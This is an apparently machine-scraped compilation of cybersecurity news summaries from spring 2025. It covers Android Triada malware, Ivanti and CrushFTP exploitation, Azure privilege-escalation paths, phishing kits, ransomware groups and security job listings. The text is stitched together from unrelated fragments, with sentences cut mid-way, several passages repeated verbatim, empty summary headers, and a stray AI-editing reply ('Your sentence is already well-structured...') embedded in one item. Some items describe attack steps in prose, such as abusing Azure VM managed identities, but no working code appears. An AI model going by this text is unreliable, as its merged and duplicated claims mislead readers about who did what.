Coinbase-themed email with seeds for the victim to use Source: SilentPush That is because, when creating a new wallet, the victim isn"t using a secure, pre-generated seed phrase from the company (Coinbase) like they are made to believe, but instead using one for a wallet already under the attackers" control. "Autosummary:
It"s believed that the same PAT facilitated access to both "spotbugs/spotbugs" and "reviewdog/action-setup," meaning the leaked PAT could be abused to poison "reviewdog/action-setup." "The attacker somehow had an account with write permission in spotbugs/spotbugs, which they were able to use to push a branch to the repository and access the CI secrets," Unit 42 said. "Autosummary:
According to a copy of the breach notification letters, the attackers stole employee, contractor, and parking data in various combinations, including names, dates of birth, Social Security numbers (or last four digits of Social Security number), driver"s license or other government identification card numbers, and some medical information. "In 56% of Sophos managed detection and response (MDR) and incident response (IR) cases, attackers gained initial access to networks by exploiting external remote services, including edge devices such as firewalls and VPNs, and by leveraging valid accounts. Compromised credentials remain the top cause of attacks The combination of external remote services and valid accounts aligns with the top root causes of attacks. For the second year in row, compromised credentials were the number one … More
The post Cybercriminals exfiltrate data in just three days appeared first on Help Net Security.
"Autosummary:
In 56% of Sophos managed detection and response (MDR) and incident response (IR) cases, attackers gained initial access to networks by exploiting external remote services, including edge devices such as firewalls and VPNs, and by leveraging valid accounts. When analyzing MDR and IR investigations, the Sophos X-Ops team looked specifically at ransomware, data exfiltration, and data extortion cases to identify how fast attackers progressed through the stages of an attack within an organization. "There’s been a notable shift in the types of threats targeting software developers, with a total of 17,954 open source malware packages identified in Q1 2025, according to Sonatype. Quarterly breakdown (Source: Sonatype) The Q1 figure represents a significant decrease from the more than 34,000 malicious packages discovered last quarter, largely due to a sharp drop in security holdings packages. However, compared to the same period last year, the overall malware count more than doubled. … More
The post Open-source malware doubles, data exfiltration attacks dominate appeared first on Help Net Security.
"Autosummary:
"Malware peddlers are saddling users with the TookPS downloader and the Lapmon and TeviRat backdoors via malicious sites that mimic official ones and ostensibly offer legitimate software for download, Kaspersky researchers have warned. Malicious websites (Source: Kaspersky) The list of impersonated software includes: UltraViewer (remote desktop software) AutoCAD (2D and 3D computer-aided design software app) SketchUp (3D modeling software) Ableton (music production software) Quicken (personal finance app) “To protect against these attacks, users are advised … More
The post Beware fake AutoCAD, SketchUp sites dropping malware appeared first on Help Net Security.
"Autosummary:
"You’re in the middle of a sprint, juggling deadlines, debugging code, fine-tuning pipelines, and then it happens—you stumble across the perfect cybersecurity tool. It promises to eliminate secrets in logs, reduce risks in CI/CD pipelines, and save countless hours chasing security anomalies. But there’s one final boss to clear: the C-suite. Convincing leadership, especially those more attuned to balance sheets than breach reports, can feel like selling a Wi-Fi router to someone without any internet … More
The post 7 ways to get C-suite buy-in on that new cybersecurity tool appeared first on Help Net Security.
"Autosummary:
Securing buy-in is the path forward Ultimately, the key is to speak the C-suite’s language, one that prioritizes outcomes over features, strategy over tactics, and growth over stagnation.Lead with business value, not features Executives care about outcomes, such as cost savings, operational efficiency, and competitive edge.You’re in the middle of a sprint, juggling deadlines, debugging code, fine-tuning pipelines, and then it happens—you stumble across the perfect cybersecurity tool.For instance, if the tool reduces detection and response times from five hours to one, reclaiming four hours per incident, and your team handles 100 incidents annually, the value becomes tangible. "Cybersecurity isn’t what it used to be. Attackers are moving quicker, disruptions happen all the time, and many security plans built for more predictable times just can’t keep up. With everything from ransomware to geopolitical threats to cloud slip-ups hitting companies, there’s a shift happening: security needs to be ready for chaos, not just focused on keeping things safe. That shift changes everything: how companies plan, how they invest, and how they recover. From protection … More
The post Building a cybersecurity strategy that survives disruption appeared first on Help Net Security.
"Autosummary:
“Forging strong partnerships with key stakeholders, including IT teams, executive leadership, and external cybersecurity experts, enhances the effectiveness of cybersecurity strategy.Invest in automation to enhance the efficiency of detection, triage, and initial response tasks, while orchestration platforms enable coordinated workflows across security and IT tools, significantly boosting response agility.Resilience is a whole-organisation challenge, requiring collaboration among the CISO, CIO, COO, and department heads.Such collaboration ensures that security measures are integrated seamlessly into business operations and receive buy-in,” Kory Daniels, CISO at Trustwave, told Help Net Security.“The work of the CISO is ongoing, requiring constant vigilance, continuous learning, and the ability to quickly pivot strategies in response to emerging risks and technological advancements.”Investing time in creating thorough, system-specific recovery plans fosters engagement, ensures clarity during emergencies, and highlights additional steps or resources that should be addressed beforehand. "Autosummary:
"Autosummary:
The latest samples of the malware analyzed by Kaspersky show that they are located in the system framework, thus allowing it to be copied to every process on the smartphone and giving the attackers unfettered access and control to perform various activities - Steal user accounts associated with instant messengers and social networks, such as Telegram and TikTok Stealthily send WhatsApp and Telegram messages to other contacts on behalf of the victim and delete them in order to remove traces Act as a clipper by hijacking clipboard content with cryptocurrency wallet addresses to replace them with a wallet under their control Monitor web browser activity and replace links Replace phone numbers during calls Intercept SMS messages and subscribe victims to premium SMS Download other programs Block network connections to interfere with the normal functioning of anti-fraud systems It"s worth noting that Triada is not the only malware that has been preloaded on Android devices during the manufacturing stages. "Autosummary:
"This tactic ensures that only valid card data is sent to the attackers, making the operation more efficient and potentially harder to detect," Jscrambler researchers Pedro Fortuna, David Alves, and Pedro Marrucho said in a report. "Autosummary:
New Triada Trojan comes preinstalled on Android devices Pierluigi Paganini April 03, 2025 April 03, 2025 A new Triada trojan variant comes preinstalled on Android devices, stealing data on setup, warn researchers from Kaspersky. "Autosummary:
What You"ll Learn: How attackers are using AI—and how you can think like them The latest threat trends you might not know about yet Easy-to-follow strategies for securing AI use in your company Why Zero Trust is key to staying safe is key to staying safe A practical approach to building long-term cyber resilience Cyber threats won"t wait. "Autosummary:
"Autosummary:
GitHub Actions logs, especially those from March 10-14, 2025, should be audited for signs of secrets being printed, especially base64-encoded blobs. "Autosummary:
Reported victims of the HellCat ransomware have included Israel"s parliament The Knesset (extracting 64GB of sensitive data), Jordan"s Ministry of Education (stealing images of ID cards, divorce papers, and various letters addressed to the Minister), and mobile device provider Transsion. Image The note left by the attackers, promises that paying the ransom will not only deliver you the decryptor, but also "a description of your network vulnerabilities and information security recommendations.Like many other ransomware operations, HellCat breaks into organisations, steals sensitive files, and encrypts computer systems - demanding a ransom payment for a decryption key and to prevent the leaking of stolen files. "Autosummary:
The IT workers have also been observed undertaking various projects in the United Kingdom related to web development, bot development, content management system (CMS) development, and blockchain technology, often falsifying their identities and claiming to be from Italy, Japan, Malaysia, Singapore, Ukraine, the United States, and Vietnam. A notable aspect of the campaign is that it primarily targets centralized finance entities by impersonating companies like Coinbase, KuCoin, Kraken, Circle, Securitize, BlockFi, Tether, Robinhood, and Bybit, marking a departure from the hacking group"s attacks against decentralized finance (DeFi) entities. "Autosummary:
Contact Ivanti to migrate Ivanti Policy Secure 22.7R1.3 and prior 22.7R1.4 April 21 ZTA Gateways 22.8R2 and prior 22.8R2.2 April 19 Attacks linked to UNC5221 Chinese-nexus cyberspies While Ivanti has yet to disclose more details regarding CVE-2025-22457 attacks, Mandiant and Google Threat Intelligence Group (GTIG) security researchers revealed today that a suspected China-nexus espionage actor exploited the vulnerability tracked as UNC5221 since at least mid-March 2025. "A suspected Chinese APT group has exploited CVE-2025-22457 – a buffer overflow bug that was previously thought not to be exploitable – to compromise appliances running Ivanti Connect Secure (ICS) 22.7R2.5 or earlier or Pulse Connect Secure 9.1x. The vulnerability was patched by Ivanti in ICS 22.7R2.6, released on February 11, 2025. But, apparently, the threat actor studied the patch and “uncovered through a complicated process, [that] it was possible to exploit 22.7R2.5 and earlier … More
The post Ivanti VPN customers targeted via unrecognized RCE vulnerability (CVE-2025-22457) appeared first on Help Net Security.
"Autosummary:
Once in, the attackers deployed two new malware families – the TRAILBLAZE in-memory only dropper and the BRUSHFIRE passive backdoor – as well as elements of the SPAWN malware ecosystem that was seen in previous UNC5221 attacks, including: SPAWNSLOTH – a log tampering utility SPAWNSNARE – a utility used to extract the uncompressed linux kernel image (vmlinux) into a file and encrypt it SPAWNWAVE – a tool combining the capabilities of the SPAWNCHIMERA and RESURGE malware families A modified version of Ivanti’s Integrity Checker Tool (ICT) to evade detection “[Google Threat Intelligence Group (GTIG)] assesses that UNC5221 will continue pursuing zero-day exploitation of edge devices based on their consistent history of success and aggressive operational tempo. "Autosummary:
"The threat actor likely used Facebook to drive traffic to the fake Windows 11 Pro download pages, as we observed Facebook referrer URLs in multiple cases," Microsoft said in a series of posts on X. "Latrodectus 1.9, the malware"s latest evolution first observed in February 2025, reintroduced the scheduled task for persistence and added command 23, enabling the execution of Windows commands via "cmd.exe /c ."" The disclosure also follows a surge in campaigns that use QR codes in phishing documents to disguise malicious URLs as part of widespread attacks aimed at Europe and the U.S., resulting in credential theft. "Autosummary:
China-linked group UNC5221 exploited Ivanti Connect Secure zero-day since mid-March Pierluigi Paganini April 03, 2025 April 03, 2025 Ivanti addressed a critical remote code execution flaw in Connect Secure, which has been exploited since at least mid-March 2025. "Autosummary:
"BlueToolkit is an open-source tool that helps find security flaws in Bluetooth Classic devices. It runs known and custom exploits to test if a device is vulnerable. Right now, it includes 43 different exploits. Some are public, and others were made specifically for this toolkit. “The framework allows you to reuse PoCs of different attacks and connect your own hardware with minimal code/configuration needed. The concept is simple and known – vulnerability scanners make use … More
The post BlueToolkit: Open-source Bluetooth Classic vulnerability testing framework appeared first on Help Net Security.
"Autosummary:
Researchers have already used the framework to find 64 vulnerabilities in 22 cars (Audi, BMW, Chevrolet, Honda, Hyundai, Mercedes-Benz, Mini, Opel, Polestar, Renault, Skoda, Toyota, VW, Tesla). "99% of email threats reaching corporate user inboxes in 2024 were response-based social engineering attacks or contained phishing links, according to Fortra. Only 1% of malicious emails that reached user inboxes delivered malware. This shows that while common pre-delivery email defenses are effective at stopping malware, they are far less capable of blocking high risk threats like business email compromise and credential phishing. 49% of the Q4 attacks targeted Microsoft 365 credentials as they can … More
The post Only 1% of malicious emails that reach inboxes deliver malware appeared first on Help Net Security.
"Autosummary:
Tools for development, email, business services, etc., provide cybercriminals with infrastructure at zero cost. Fortra expects cybercriminals to use this data to personalize attacks even further, utilizing information about individuals, their families, their co-workers, etc. "Autosummary:
" The SHELBYC2 backdoor, for its part, parses commands listed in another file named "Command.txt" to download/upload files from/to a GitHub repository, load a .NET binary reflectively, and run PowerShell commands. SHELBY Malware Uses GitHub for Command-and-Control The development comes as Elastic Security Labs detailed a new malware family dubbed SHELBY that uses GitHub for command-and-control (C2), data exfiltration, and remote control. "Autosummary:
Key NIST Frameworks for Compliance NIST offers multiple cybersecurity frameworks, but the most relevant for service providers include: NIST Cybersecurity Framework (CSF 2.0) : A flexible, risk-based framework designed for businesses of all sizes and industries. For service providers, achieving NIST compliance means: Enhanced security: Improved ability to identify, assess, and mitigate cybersecurity risks. Step-by-Step Guide to Achieving NIST Compliance As mentioned above, achieving NIST compliance for clients presents numerous challenges for service providers, making the process complex and daunting. Limited budgets are a frequent obstacle for many organizations, making it essential to focus on high-impact controls, leverage open-source tools, and automate compliance tasks to manage costs effectively. "Autosummary:
"Outlaw is a Linux malware that relies on SSH brute-force attacks, cryptocurrency mining, and worm-like propagation to infect and maintain control over systems," Elastic Security Labs said in a new analysis published Tuesday. "Autosummary:
Apple released the following updates: that are available for the following devices: iOS 15.8.4 and iPadOS 15.8.4 – iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation) iOS 16.7.11 and iPadOS 16.7.11 – iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation, iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generation iPadOS 17.7.6 – iPad Pro 12.9-inch 2nd generation, iPad Pro 10.5-inch, and iPad 6th generation Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, newsletter) "Autosummary:
Kidflix, one of the largest platforms used to host, share, and stream child sexual abuse material (CSAM) on the dark web, was shut down on March 11 following a joint action coordinated by German law enforcement. "Autosummary:
"The Travelers Companies announced Travelers Cyber Risk Services, a suite of capabilities added to all cyber liability policies designed to help lower both the risk of a cyberattack and the cost to recover from one. In addition to always-on threat monitoring and tailored alerts, key benefits of Travelers Cyber Risk Services include: Cyber Risk Dashboard: This 24/7 tool gives consumers the ability to monitor risks and track progress over time, view customized recommendations ranked by … More
The post Travelers Cyber Risk Services reduces the risk of a cyberattack appeared first on Help Net Security.
"Autosummary:
“This new suite of services is designed to help customers more efficiently and effectively predict, prevent and recover from cyber incidents,” said Lauren Winchester, Head of Cyber Risk Services at Travelers. "Autosummary:
" The disclosure comes weeks after Praetorian detailed several ways a lower-privilege principal can abuse an Azure virtual machine (VM) to gain control over an Azure subscription - Execute commands on an Azure VM associated with an administrative managed identity Log in to an Azure VM associated with an administrative managed identity Attach an existing administrative user-assigned managed identity to an existing Azure VM and execute commands in that VM Create a new Azure VM, attach an existing administrative managed identity to it, and execute commands in that VM by using data plane actions "After obtaining the Owner role for a subscription, an attacker may be able to leverage their broad control over all subscription resources to find a privilege escalation path to the Entra ID tenant," security researchers Andrew Chang and Elgin Lee said. "Autosummary:
“If all of the following were true, a malicious user was able to view security sensitive files and/or inject content into those files: writes enabled for the default servlet (disabled by default) support for partial PUT (enabled by default) a target URL for security sensitive uploads that is a sub-directory of a target URL for public uploads attacker knowledge of the names of security sensitive files being uploaded the security sensitive files also being uploaded via partial PUT If all of the following were true, a malicious user was able to perform remote code execution: writes enabled for the default servlet (disabled by default) support for partial PUT (enabled by default) application was using Tomcat’s file based session persistence with the default storage location application included a library that may be leveraged in a deserialization attack” Tomcat versions 9.0.99, 10.1.35, and 11.0 addressed the vulnerability. "Autosummary:
Hosts: Graham Cluley: @grahamcluley.com @[email protected] Carole Theriault: @caroletheriault Episode links: Sponsored by: Harmonic – Let your teams adopt AI tools safely by protecting sensitive data in real time with minimal effort. "Cloud Security Engineer Fexco | Ireland | Hybrid – View job details As a Cloud Security Engineer, you will design and implement security frameworks for cloud environments. Enforce secure access policies, MFA, and least privilege principles. Develop automated security solutions using IaC and scripting. Perform security assessments and recommend improvements. Cyber Security Analyst Shannex | Canada | On-site – View job details As a Cyber Security Analyst, you will develop and maintain security architecture principles, … More
The post Cybersecurity jobs available right now: April 1, 2025 appeared first on Help Net Security.
"Autosummary:
Senior Engineer – Cyber Security Presight | UAE | On-site – View job details As a Senior Engineer – Cyber Security, you will architect, deploy, and manage security controls across EDR, NDR, PAM, SIEM (Splunk), MDM, and endpoint security ecosystems, ensuring continuous threat visibility and response. Information Security Engineer CareDx | USA | Hybrid – View job details As an Information Security Engineer, you will design, deploy, and manage comprehensive security architectures and tools, including SIEM, EDR, firewalls, IDPS, and WAF. Software Engineer, Security Zip | USA | On-site – View job details As a Software Engineer, Security, you will develop features to improve security and mitigate risk within Zip’s products, such as multi-region user authentication, account take-over detection systems, and universal audit trails. Cyber Security Analyst Shannex | Canada | On-site – View job details As a Cyber Security Analyst, you will develop and maintain security architecture principles, strategy and practices, roadmaps, and technical applications to engineer reliable solutions and measures for the business.MT | Malta | Hybrid – View job details As a Technical Lead and Security Specialist, you will be responsible for the development and implementation of a security risk management plan, as well as for initial and periodic information security risk assessments, analysis, mitigation, and remediation. "With global tensions climbing, cyber attacks linked to nation-states and their allies are becoming more common, sophisticated, and destructive. For organizations, cybersecurity can’t be treated as separate from world events anymore, they’re closely connected. Conflict between countries is spilling into cyberspace. Whether it’s during military escalations, trade disputes, or diplomatic standoffs, governments are using cyber operations to exert pressure, gather intelligence, or disrupt systems. These attacks often hit private businesses, not just governments or critical … More
The post Why global tensions are a cybersecurity problem for every business appeared first on Help Net Security.
"Autosummary:
Whether it’s during military escalations, trade disputes, or diplomatic standoffs, governments are using cyber operations to exert pressure, gather intelligence, or disrupt systems. Andrew Ginter, VP of Industrial Security at Waterfall Security, urges OT sites to take a hard look at their evolving risk landscape, especially as they adopt Internet-connected industrial services and AI-driven efficiencies.According to DeBolt, “Heightened geopolitical tensions have reflected this transition in groups originating from China, Iran, and North Korea over the last couple of years—although the latter is somewhat more well-known for its duplicitous activity that often blurs the line of more traditional e-crime threats.”Michael DeBolt, Chief Intelligence Officer at Intel 471, explains: “Increasing polarization worldwide has seen the expansion of the state-backed threat actor role, with many established groups taking on financially motivated responsibilities alongside their other strategic goals.”Don’t just involve IT, bring in legal, compliance, communications, and business units.With global tensions climbing, cyber attacks linked to nation-states and their allies are becoming more common, sophisticated, and destructive.“We’re seeing bricked controllers causing prolonged outages, damaged heavy equipment leading to even longer downtimes, and compromised safety systems—none of which are acceptable,” Ginter warns. "Most people groan at the prospect of security training. It’s typically delivered through dull online videos or uninspiring exercises that fail to capture real-world urgency. To make a real difference in cyber crisis readiness, personnel need the opportunity to test their mettle in a crisis, to build the muscle memory and decision-making skills that will make a difference when a real attack occurs. This is where cyber simulations come in, by providing the opportunity to … More
The post How to build an effective cybersecurity simulation appeared first on Help Net Security.
"Autosummary:
To make a real difference in cyber crisis readiness, personnel need the opportunity to test their mettle in a crisis, to build the muscle memory and decision-making skills that will make a difference when a real attack occurs.However, there should be a strong collaborative aspect, with input from security, disaster recovery, and other involved teams.This could be technical capabilities, executive decision-making, cross-team coordination, or a combination of factors. Highly granular data is important here, letting you delve in by department, team, and individual performance. Achieving real cyber crisis readiness Cybersecurity simulations are not just a compliance exercise – they build real-world resilience, helping companies prepare for a genuine crisis. "In this Help Net Security interview, Yinglian Xie, CEO at DataVisor, explains how evolving fraud tactics require adaptive, AI-driven prevention strategies. With fraudsters using generative AI to launch sophisticated attacks, financial institutions must adopt adaptive AI solutions to stay ahead. Xie points out the role of real-time data orchestration, machine learning, and integrated security platforms in balancing fraud prevention with a seamless user experience. How are fraud tactics evolving with the rise of generative AI … More
The post Generative AI Is reshaping financial fraud. Can security keep up? appeared first on Help Net Security.
"Autosummary:
For example, a fraud ring conducting large-scale coordinated attacks involving account takeover and mass registration could use different IPs and device IDs, IP addresses traced back to VPN or data centers, the recurrence of specific payee account numbers, etc.In this Help Net Security interview, Yinglian Xie, CEO at DataVisor, explains how evolving fraud tactics require adaptive, AI-driven prevention strategies.Sophisticated AI technologies and machine learning models can analyze large sets of data and signals in real-time to identify hidden patterns and correlations through usage patterns, device information, location information, network characteristics. "Autosummary:
Hiding WordPress malware in the mu-plugins directory to avoid detection Pierluigi Paganini April 01, 2025 April 01, 2025 Sucuri researchers spotted threat actors deploying WordPress malware in the mu-plugins directory to evade security checks. The script constructs a URL, sends requests to an external server, fetches content via file_get_contents() or cURL, modifies robots.txt , checks response markers, and pings sitemaps. "Autosummary:
Even though scammers can use Artificial Intelligence to create convincing emails that appear to come from the IRS, there are often some tell-tale signs of social engineering attempts: Too good to be true: Huge, unexpected tax returns are usually just an incentive to get you to surrender private information in the hopes of obtaining that sum. Never send sensitive personal information such as your bank account, charge card, or Social Security number by email.Dear receiver, As part of our ongoing efforts to ensure compliance with the latest tax regulations, we are conducting a mandatory review and update of your tax records. "Autosummary:
Finally, if you suspect your WordPress-powered website could be hosting malicious MU-plugins, look in the wp-content/mu-plugins folder. "Autosummary:
"Autosummary:
Specifically, the latest update for iOS 18.4 and iPadOS 18.4 fixes 77 vulnerabilities, including CVE-2025-30456 (app sandbox bypass allowing root privilege escalation), CVE-2025-24097 (arbitrary file metadata access), and CVE-2025-31182 (arbitrary file deletion). "Autosummary:
"Autosummary:
"Exploitation attempts targeting the CVE-2025-2825 vulnerability on internet-facing CrushFTP instances are happening, the Shadowserver Foundation has shared on Monday, and the attackers have been leveraging publicly available PoC exploit code. What can be done? CVE-2025-2825, affecting CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0, is an authentication bypass vulnerability that may allow unauthenticated attackers to access CrushFTP servers through an exposed HTTP(S) port. The vulnerability was privately disclosed to CrushFTP customers via email on … More
The post Attackers are targeting CrushFTP vulnerability with public PoC (CVE-2025-2825) appeared first on Help Net Security.
"Autosummary:
CVE confusion As it happens, the CrushFTP’s security advisories for version 11 and 10 didn’t list the flaw’s CVE number until today, and the changelog for CrushFTP v11.3.1 – which includes the fix – still doesn’t. "Stellar Cyber launched its Open Cybersecurity Alliance based on its award-winning Open XDR platform. This initiative streamlines security operations, improves interoperability, and enhances threat detection and response for enterprises and MSSPs. The new alliance challenges the idea that in order to be effective, ecosystems must be built on proprietary data or a closed model, with a “members-only” approach advocating for a specific data format. The Open Cybersecurity Alliance takes a completely different approach by enabling … More
The post Stellar Cyber Open Cybersecurity Alliance enhances threat detection and response appeared first on Help Net Security.
"Autosummary:
The newly launched ecosystem already features integrations with top security platforms across many different categories, including endpoint detection and response (EDR), identity and access management (IAM), privileged access security (PAS), secure access service edge (SASE), next-generation firewall, email security, vulnerability management (VM), cloud security, infrastructure as a service (IaaS), and software as a service (SAAS), and more. “At Netskope, we are committed to delivering modern security, networking, and analytics solutions that empower organizations to protect their users and data, regardless of where they work,” said Andy Horwitz, SVP of Global Partner Ecosystems at Netskope. By openly integrating with best-in-class solutions across all aspects of the security stack, customers can add speed and scale to their security operations with increased visibility, more accurate threat correlation, and better response times via a unified, easy-to-use technology alliance ecosystem. "Autosummary:
The development comes as Barracuda warned of a "massive spike" in PhaaS attacks in early 2025 using Tycoon 2FA, EvilProxy, and Sneaky 2FA, with each service accounting for 89%, 8%, and 3% of all the PhaaS incidents, respectively. "Autosummary:
Your sentence is already well-structured, but here’s a slight refinement for clarity and flow: Threat actors, including the ransomware group Cl0p, are known for attacking file transfer software such as Accellion FTA, MOVEit Transfer, GoAnywhere MFT, and Cleo. "Autosummary:
The multi-stage process, involving multiple script languages and obfuscation techniques, can effectively bypass security solutions, leading to unauthorized access, data theft, and system compromise." "In individuals, insanity is rare; but in groups, parties, nations, and epochs, it is the rule. "Deepfakes are a type of synthetic media created using AI and machine learning. In simple terms, they produce videos, images, audio, or text that look and sound real, even though the events depicted never actually happened. These altered clips spread across social media, messaging apps, and video-sharing platforms, blurring the line between reality and fiction. The term “deepfake” was coined in 2017 when a Reddit user created a subreddit with that name. This subreddit was … More
The post How to recognize and prevent deepfake scams appeared first on Help Net Security.
"Autosummary:
At first, people used deepfakes for entertainment and fun, but over time, they have become a dangerous tool in the hands of criminals for fraud, identity theft, blackmail, and spreading misinformation. With the availability of various AI tools, ranging from open-source software (DeepFaceLab, Faceswap) to mobile applications (Zao, Reface), making a deepfake now requires little more than a laptop or smartphone and the right software.In simple terms, they produce videos, images, audio, or text that look and sound real, even though the events depicted never actually happened. "Autosummary:
This week"s list includes — CVE-2025-2783, CVE-2025-2476 (Google Chrome), CVE-2025-2857 (Mozilla Firefox, Tor Browser), CVE-2025-1974 (Kubernetes NGINX Ingress Controller), CVE-2025-26512 (NetApp SnapCenter), CVE-2025-22230 (VMware Tools for Windows), CVE-2025-2825 (CrushFTP), CVE-2025-20229 (Splunk), CVE-2025-30232 (Exim), CVE-2025-1716, CVE-2025-1889, CVE-2025-1944, CVE-2025-1945 (picklescan), and CVE-2025-2294 (Kubio AI Page Builder plugin).Previously, the duo revealed multiple vulnerabilities in Phoenix Contact CHARX SEC-3100, an electric vehicle (EV) charger controller, that could facilitate privilege escalation and remote code execution (CVE-2024-6788, CVE-2024-25994, CVE-2024-25995, and CVE-2024-25999).This malware harvests sensitive data such as system metadata, files matching certain extensions, running processes, installed software, and user credentials, as well as information from cryptocurrency wallets, messaging applications, and web browsers.This malware harvests sensitive data such as system metadata, files matching certain extensions, running processes, installed software, and user credentials, as well as information from cryptocurrency wallets, messaging applications, and web browsers.46 Flaws in Solar Inverters From Sungrow, Growatt, and SMA — As many as 46 security bugs have discovered in products from three solar inverter vendors, Sungrow, Growatt, and SMA that, if successfully exploited, could permit attackers to seize control of devices and cause potential power blackouts.With support for multiple scanning modes, advanced discovery techniques, and customizable payloads, Dalfox offers deep insights into reflected, stored, and DOM-based XSS vulnerabilities—all while providing detailed, developer-friendly output.Exploiting Car Infotainment System to Plant Spyware — NCC Group researchers Alex Plaskett and McCaulay Hudson have demonstrated a trio of zero-day exploits (CVE-2024-23928, CVE-2024-23929, and CVE-2024-23930) that could be weaponized to break into Pioneer DMH-WT7600NEX, gain shell access, and install malicious software on the in-vehicle infotainment (IVI) system.The vulnerabilities, collectively named SUN:DOWN, "can be exploited to execute arbitrary commands on devices or the vendor"s cloud, take over accounts, gain a foothold in the vendor"s infrastructure, or take control of inverter owners" devices.""These online forums or communities [...] see offenders collaborate or compete to cause harm across a broad spectrum of criminality – both on and offline – including cyber, fraud, extremism, serious violence, and child sexual abuse," the NCA said."These online forums or communities [...] see offenders collaborate or compete to cause harm across a broad spectrum of criminality – both on and offline – including cyber, fraud, extremism, serious violence, and child sexual abuse," the NCA said." — As many as 46 security bugs have discovered in products from three solar inverter vendors, Sungrow, Growatt, and SMA that, if successfully exploited, could permit attackers to seize control of devices and cause potential power blackouts. — Meta has announced that its AI-powered virtual assistant, Meta AI, is finally launching across Facebook, Instagram, WhatsApp, and Messenger in the European Union and United Kingdom over the coming weeks.Also called OrpaCrab, the sophisticated Linux-based backdoor is capable of surveillance, lateral movement, data exfiltration, system manipulation, and remote control.Also called OrpaCrab, the sophisticated Linux-based backdoor is capable of surveillance, lateral movement, data exfiltration, system manipulation, and remote control.The vulnerabilities, collectively named SUN:DOWN, "can be exploited to execute arbitrary commands on devices or the vendor"s cloud, take over accounts, gain a foothold in the vendor"s infrastructure, or take control of inverter owners" devices. "Autosummary:
Infoblox researchers discovered a new phishing-as-a-service (PhaaS) platform that generated multiple phishing kits, called Morphing Meerkat, using DNS mail exchange (MX) records to deliver fake login pages and targeting over 100 brands.Morphing Meerkat phishing kits exploit DNS MX records Pierluigi Paganini March 31, 2025 March 31, 2025 Morphing Meerkat phishing kits exploit DNS MX records to deliver spoofed login pages, targeting over 100 brands. "CISA has released indicators of compromise, detection signatures, and updated mitigation advice for rooting out a newly identified malware variant used by the attackers who breached Ivanti Connect Secure VPN appliances in December 2024 by exploiting the CVE-2025-0282 zero-day. The updated mitigation instructions stress the importance of conducting a factory reset of all devices – even those where threat hunting did not reveal evidence of compromise – as well as a factory reset of cloud … More
The post CISA reveals new malware variant used on compromised Ivanti Connect Secure devices appeared first on Help Net Security.
"Autosummary:
"The European Commission has approved the 2025-2027 Digital Europe Programme (DIGITAL) work program, allocating €1.3 billion to advance key technologies essential for the EU’s future and technological sovereignty. DIGITAL is an EU funding initiative designed to bring digital technology closer to businesses, citizens, and public administrations. Digital technology is essential for communication, work, science, and tackling environmental challenges. The COVID-19 pandemic highlighted Europe’s reliance on external systems, while Russia’s war against Ukraine exposed vulnerabilities in … More
The post EU invests €1.3 billion in AI and cybersecurity appeared first on Help Net Security.
"Autosummary:
With a total budget exceeding €8.1 billion, the program focuses on several key areas such as supercomputing, artificial intelligence, cybersecurity, advanced digital skills, and the widespread adoption of digital technologies across the economy and society. "Autosummary:
"Autosummary:
Victims clicking on the phishing links are redirected to fake landing pages impersonating state government toll and parking agencies or private entities, such as USPS, DHL, Royal Mail, FedEx, Revolut, Amazon, American Express, HSBC, E-ZPass, SunPass, Transport for London, and more. "Autosummary:
Rhadamanthys is far from the only stealer in Water Gamayun"s arsenal, for it has been observed delivering another commodity stealer called StealC, as well as three custom PowerShell variants referred to as EncryptHub Stealer variant A, variant B, and variant C. The bespoke stealer is fully-featured malware that can collect extensive system information, including details about antivirus software, installed software, network adapters, and running applications. "Autosummary:
Last week, Cisco disclosed two vulnerabilities in its Smart Licensing Utility: CVE-2024-20439, a static credential backdoor, and CVE-2024-20440, an information disclosure flaw. "Autosummary:
RESURGE ("libdsupgrade.so"), per CISA, is an improvement over SPAWNCHIMERA with support for three new commands - Insert itself into "ld.so.preload," set up a web shell, manipulate integrity checks, and modify files Enable the use of web shells for credential harvesting, account creation, password resets, and privilege escalation Copy the web shell to the Ivanti running boot disk and manipulate the running coreboot image CISA said it also unearthed two other artifacts from an unspecified critical infrastructure entity"s ICS device: A variant of SPAWNSLOTH ("liblogblock.so") contained within RESURGE and a bespoke 64-bit Linux ELF binary ("dsmain"). "Autosummary:
The bot component of the malware supports a set of 23 commands that it can execute on the device, including: Enable call forwarding Launch a specific application Post a push notification Send SMS to all contacts or a specified number Get SMS messages Request Device Admin privileges Enable a black overlay Enable/disable sound Lock screen Make itself the default SMS manager The malware also offers remote access trojan (RAT) functionality, which enables its operators to tap on the screen, navigate the user interface, perform swipe gestures, and more. "Autosummary:
"Autosummary:
New Clop Ransomware CLEO victim list pic.twitter.com/2Ape3KVuHO — Dominic Alvieri (@AlvieriD) January 15, 2025 In December 2024, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability CVE-2024-50623 (CVSS score 8.8), which impacts multiple Cleo products to its Known Exploited Vulnerabilities (KEV) catalog. “On December 3, Huntress identified an emerging threat involving Cleo’s LexiCom, VLTransfer, and Harmony software, commonly used to manage file transfers.” "Autosummary:
CISA warns of RESURGE malware exploiting Ivanti flaw Pierluigi Paganini March 30, 2025 March 30, 2025 The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warns of RESURGE malware, targeting a vulnerability in Ivanti Connect Secure (ICS) appliances.It acts as a rootkit, dropper, backdoor, bootkit, proxy, and tunneler. "Autosummary:
Some of notable findings are listed below - The use of Rclone to exfiltrate data to the MEGA cloud storage service, in some cases even installing the MEGA client directly on victim systems The threat actors have created at least eight accounts on MEGA using disposable email addresses created via YOPmail (e.g., "zubinnecrouzo-6860@yopmail.com") to store the victim data A reverse engineering of the ransomware has uncovered source code and ransom note similarities with another ransomware strain codenamed DragonForce, which has targeted organizations in Saudi Arabia (While DragonForce is written in Visual C++, BlackLock uses Go) "$$$," one of the main operators of BlackLock, launched a short-lived ransomware project called Mamona on March 11, 2025 In an intriguing twist, BlackLock"s DLS was defaced by DragonForce on March 20 – likely by exploiting the same LFI vulnerability (or something similar) – with configuration files and internal chats leaked on its landing page. "Autosummary:
